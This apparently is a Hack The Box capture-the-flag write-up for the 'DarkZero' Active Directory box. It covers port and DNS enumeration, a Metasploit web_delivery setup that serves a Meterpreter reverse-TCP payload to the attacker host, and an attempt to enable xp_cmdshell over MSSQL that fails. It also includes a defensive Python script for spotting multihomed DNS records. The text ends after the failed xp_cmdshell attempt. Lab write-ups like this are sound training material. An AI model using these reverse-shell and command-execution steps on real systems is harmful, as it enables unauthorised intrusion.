Hack The Box - Season 9 HTB DarkZero Writeup - Hard - Weekly - October 4th, 2025

DarkZero - HTB Write-up

Difficulty: Hard



📋 Box Overview

DarkZero is a layered Active Directory challenge that simulates a realistic enterprise environment. This box requires chaining multiple advanced techniques including SQL linked servers, Kerberos delegation, ticket manipulation, and cross-subnet pivoting. You'll encounter multihomed hosts, split-horizon DNS, and various privilege escalation paths that demand both technical skill and persistence.

Key Learning Areas:

  • Active Directory enumeration and exploitation
  • SQL Server linked server abuse
  • Kerberos ticket collection and Pass-the-Ticket attacks
  • Network pivoting with Ligolo
  • CVE exploitation for privilege escalation

Initial Credentials:
john.w / RFulUtONCOL!


šŸ” Enumeration

Port Scanning

Starting with a comprehensive nmap scan to identify open services:

nmap -p 1-65535 -T4 -A -v <target_ip>

Key Services Identified:

  • DNS (53) - Simple DNS Plus
  • Kerberos (88) - Windows Kerberos authentication
  • LDAP (389/636/3268/3269) - Active Directory services
  • SMB (139/445) - File sharing
  • MSSQL (1433) - Microsoft SQL Server 16.00.1000.00
  • WinRM (5985) - Remote management
  • RPC (135, various high ports) - Remote procedure calls

Domain Information

Domain: darkzero.htb
Primary DC: DC01.darkzero.htb
Secondary DC: dc02.darkzero.ext

Hosts File Generation

Using NetExec to automatically populate the hosts file:

nxc smb <target_ip> -u 'john.w' -p 'RFulUtONCOL!' --generate-hosts-file /etc/hosts

SMB Enumeration

smbmap -H <target_ip> -d 'darkzero.htb' -u 'john.w' -p 'RFulUtONCOL!'

Only the default shares were present, so there is no immediate vector here. BloodHound enumeration also yielded little of use.

DNS Enumeration - Critical Discovery

Querying for DNS records reveals something interesting:

dig @DC01.darkzero.htb ANY darkzero.htb

Important Finding:
The domain resolves to two different IP addresses:

  • Public-facing network (10.x.x.x/8)
  • Internal network (172.16.20.1/16)

This indicates a multihomed host with a split-horizon DNS configuration. The 172.16.20.x subnet is most likely reachable only from inside the internal network, so we will need to pivot to reach it.
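As an added example (not part of the original write-up), the following Python script parses the answer section of `dig` output and flags any name whose A records span more than one address zone, which is the same split-horizon symptom spotted above; a defender can run it against their own zone transfers or resolver answers to catch names that leak internal addresses. The sample dig output, the addresses in it and the zone boundaries are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of a `dig ... ANY` answer section (not the box's real output).
SAMPLE_DIG = """\
;; ANSWER SECTION:
darkzero.htb.        600   IN  A   10.10.11.20
darkzero.htb.        600   IN  A   172.16.20.1
darkzero.htb.        3600  IN  NS  dc01.darkzero.htb.
dc01.darkzero.htb.   3600  IN  A   10.10.11.20
"""

# Address zones as the defender defines them (assumption: the 10/8 side is the
# externally reachable network, 172.16/12 is internal-only).
ZONES = {
    "external": [ipaddress.ip_network("10.0.0.0/8")],
    "internal": [ipaddress.ip_network("172.16.0.0/12")],
}

A_RECORD = re.compile(r"^(\S+)\s+\d+\s+IN\s+A\s+(\d+\.\d+\.\d+\.\d+)$")


def parse_a_records(dig_output):
    """Return {owner_name: [addresses]} for every A record in dig's output."""
    records = defaultdict(list)
    for line in dig_output.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            records[m.group(1)].append(ipaddress.ip_address(m.group(2)))
    return dict(records)


def zone_of(addr, zones=ZONES):
    """Name of the first zone containing addr (string or address), else 'unclassified'."""
    addr = ipaddress.ip_address(addr)
    for name, nets in zones.items():
        if any(addr in net for net in nets):
            return name
    return "unclassified"


def find_multihomed(records, zones=ZONES):
    """Names whose A records span more than one zone -> {name: sorted zone names}."""
    flagged = {}
    for name, addrs in records.items():
        seen = sorted({zone_of(a, zones) for a in addrs})
        if len(seen) > 1:
            flagged[name] = seen
    return flagged


if __name__ == "__main__":
    for name, spanned in find_multihomed(parse_a_records(SAMPLE_DIG)).items():
        print(f"{name} answers from multiple zones: {', '.join(spanned)}")
```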


💉 Initial Access via MSSQL

Setting Up Web Delivery

First, prepare a Meterpreter payload delivery mechanism:

msfconsole -q -x "use exploit/multi/script/web_delivery; \
  set payload windows/x64/meterpreter/reverse_tcp; \
  set LHOST tun0; \
  set LPORT 443; \
  set target 2; \
  exploit -j"

This creates a PowerShell one-liner that downloads and executes our payload.

MSSQL Connection

Connect to the SQL server using our credentials:

mssqlclient.py 'darkzero.htb/john.w:RFulUtONCOL!@<target_ip>' -windows-auth

Attempting Command Execution

Try enabling xp_cmdshell on DC01:

enable_xp_cmdshell

Result: āŒ Failed - insufficient privileges